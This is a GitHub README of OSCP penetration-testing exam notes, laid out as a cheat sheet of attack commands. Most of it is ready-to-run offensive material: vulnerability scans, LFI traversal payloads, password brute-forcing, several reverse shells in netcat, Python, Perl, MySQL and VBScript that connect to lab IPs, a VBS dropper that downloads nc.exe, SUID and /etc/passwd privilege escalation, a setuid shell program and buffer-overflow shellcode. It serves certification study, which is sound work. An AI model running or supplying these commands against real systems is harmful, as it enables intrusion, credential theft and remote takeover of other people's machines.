Skip to content
/ OSCP Public
forked from wwwstartw/OSCP

OSCP license passed successfully, notes made before the exam

0 stars 20 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Ohrenmann/OSCP

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
README.md
README.md
 
 

Repository files navigation

OSCP

outline

Information Gathering

nmap

  • scanning open port and server
$ nmap ip --top-ports 1000 --open -sV
  • speed up
$ nmap ip -SU --min-rate 5000
  • UDP
$ nmap -sU --min-rate 5000 ip
  • smb vulnerable
$ nmap -v -p 139, 445 --script="smb-vuln-*,samba-vuln-*" 10.11.1.1-254
$ nmap -p 139, 445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.11.1.1
  • ftp vulnerable
$ nmap -p 21 -sV -sC --script="ftp-vuln-*, ftp-anon" 10.11.1.1-254
  • http vulnerable
$ nmap -v -p 139, 445 --script="http-vuln-*" ip

nikto

  • web deep scanning
$ nikto -host ip

gobuster

  • bruteforcing web directory files
$ gobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

enum4linux

  • Windows and Samba systems
$ enum4linux -U -o ip

smbclient

  • discover directory and os, smb version
$ smbclient -L \\DNSname -I ip -N
$ smbclient -L "//10.10.10.3/" –N
  • log in smb server
$ smbclient //DNSname/wwwroot -I ip -N

smbmap

*SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

smbmap -H 10.10.10.3 | tee recon/smbmap_10.10.10.3.txt

$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'

ftp

  • try to login as anonymous
user: anonymous
pass: anonymous

snmpwalk

$ snmpwalk ip -c public -v 2c > result.txt

Web application

LFI

  • ../../../../../etc/passwd%00
  • ..%01/..%01/..%01/..%01/..%01/etc/passwd
  • ../../../../../etc/passwd%23 %23 equal to MySQL query '?'
  • ../../../../../../../../../etc/passwd/././././././.[…]/./././././.
  • ../../../../../../../../../boot.ini/………[…]…………
  • ../ -> %2e%2e%2f

RFI

WordPress

wpscan

  • find vulnerable
$ wpscan -u host

wpforce

  • crack admin's password
$ python wpforce.py -si admin -w password-file.txt -u host

Reverseshell

netcat

  • standard way
$ nc -e /bin/bash 10.10.14.14 4444
  • if parameter -e is not available
*On Kali machine start listener:
nc -l 4444

*Paste this:
echo "cat /etc/passwd"

*Execute this on the target machine:
rm -f /tmp/b; mkfifo /tmp/b; /bin/sh -i 2>&1 0</tmp/b | nc 10.0.0.1 4444 1>/tmp/b

python

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.84",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

LimitShell escape

rbash

  • edit PATH to escape rbash
$ BASH_CMDS[a]=/bin/sh;a 
$ /bin/bash
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin

Password Crack

crackpot (for LM & NTLM)

check if hash has already been cracked

$ https://cracker.offensive-security.com/
Use Priority code from personal OSCP profile page

john

first obtain /etc/shadow and /etc/passwd, then

$ unshadow passwd.txt shadow.txt > hash.txt 
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

hydra

$ hydra -l root -P password-file.txt 10.11.1.219 ssh
  hydra <Username/List> <Password/List> <IP> <Method> "<Path>:<RequestBody>:<IncorrectVerbiage>"
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/uripath/login.php:username=admin&password=^PASS^:Invalid"

ncrack

$ ncrack -vv --user offsec -P password-file.txt rdp://10.11.1.35

hashcat

$ hashcat -m 1000 NTLMHASHNTHASH /usr/share/wordlists/rockyou.txt -O

Privilege Escalation

Linux

Information

  • get version
$ uname -a
$ cat /etc/*-release
  • service
$ ps

Priv Esc

find possible entry

$ find / -user root -perm -4000 -print 2>/dev/null
$ find / -perm -u=s -type f 2>/dev/null
$ find / -user root -perm -4000 -exec ls -ldb {} \;
  • nmap
$ nmap --interactive
$ nmap> !sh
  • find
$ touch pentestlab
$ find pentestlab -exec whoami \;
$ find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
  • vim
$ vim.tiny /etc/shadow
# Press ESC key
:set shell=/bin/sh
:shell
  • bash
$ bash -p
  • less
$ less /etc/passwd
!/bin/sh
  • cp If we can read/write on /etc/passwd
$ cp /etc/passwd /tmp
$ sed -i 's/root:x:0:0:root:\/root:\/bin\/bash/root::0:0:root:\/root:\/bin\/bash/g' /tmp/passwd
$ cat /tmp/passwd > /etc/passwd
  • mount
$ showmount -e ip
$ mount ip:/ /tmp/
$ wget http://10.11.0.186/4777
$ chmod 4777 exploit

$ ./4777

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
    setuid(0);
    system("/bin/bash");
    return 0;
}

https://touhidshaikh.com/blog/?p=788

Windows

Information

  • get version
$ systeminfo
  • service
$ tasklist
  • show all folder
$ dir /a
  • show default creds
$ cmdkey /list

Priv Esc

  • psexec
$ psexec -u alice -p aliceishere "c:\Users\Public\nc.exe" 10.11.0.49 5555 -e cmd.exe
  • winexe
$ winexe -U username%password //ip cmd.exe
  • runas
$ runas /savecred /user:Administrator shell.exe

BufferOverflow

connect to Windows

  • Linux
$ service ssh start
$ rdesktop -u offsec -p offsec! ip -f
  • Windows Open Tools folder, click putty, type linux ip and run.

Immunity Debugger

  • run exe, attach the execute exe
  • record EIP address
$ cyclic -l 0xEIP
  • find badchars(see code)
  • find return address find dll, and type e button to observe, then we can search for jmp esp address(gadget).
!moma modules

generate shellcode

$ msfvenom --platform Windows -a x86 -p windows/adduser USER=aaa PASS=aaa -f python –e x86/shikata_ga_nai -b "\x00\x0a"

send code

r.send("GO" + "A"*2006 + p32(gadget) + "\x90" * 8 + buf)

Others

linux execute jar file

$ java -jar xx.jar

execute sh error

$'\r': command not found convert win dos to unix, it need to convert win dos to unix.

  • dos2unix
$ dos2unix xxx.sh

use python to call bash (with TTY)

$ python -c 'import pty;pty.spawn("/bin/bash")'
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

can not find ifconfig

  • ip a
  • or try to fix ifconfig:
$ whereis ifconfig
$ PATH="$PATH":/sbin

create shell use msfvenom

$ msfvenom -p java/shell_reverse_tcp LHOST=ip LPORT=port -f war > reverse.war

FreeBSD reverse shell

$ perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

.cgi file reverse shell

#!/usr/bin/perl
require '/tmp/t.pl';

MySQL reverse shell

select cmdshell("C:\\nc.exe 10.11.0.186 4444 -e cmd.exe")

find share folder

When we found a shared folder, we can upload file to there.

$ showmount -e ip

vbs reverse shell

use it to download nc.exe and reverse shell with cscript.

$ cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs
&@echo objXMLHTTP.open "GET","http://10.11.0.186/nc.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH
TTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB
.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.
Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.
vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi
le "nc.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA
DOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No
thing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vb
s&@echo objShell.Exec("nc.exe -e cmd.exe 10.11.0.186 4444")>>poc.vbs&cscript.exe poc.vbs"

powershell download file

$ powershell -c (new-object System.Net.WebClient).DownloadFile('http://IP/shell.exe','C:\Users\username\shell.exe')

Notes

strck in get user

  • enumerate more
    • UDP

SNMP

  • 簡單網路管理協議
  • 監測連接到網絡上的設備是否有任何引起管理上關注的情況
  • 每一個被管理的系統上有運行一個叫做代理者(agent)的軟體元件,且透過SNMP對管理系統報告資訊
  • 代理者是一種存在於被管理的設備中的網路管理軟體模組。代理者控制本地機器的管理資訊,以和SNMP相容的格式傳送這項資訊

upgrading to meterpreter

winexe

  • 對方主機開啟文件共享服務時
  • 藉助Winexe工具遠程執行Windows命令
  • 該工具首先會在目標主機安裝對應的Winexe服務,然後執行指定的命令。執行完成後,該工具會自動刪除對應的服務,以避免被發現

About

OSCP license passed successfully, notes made before the exam

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published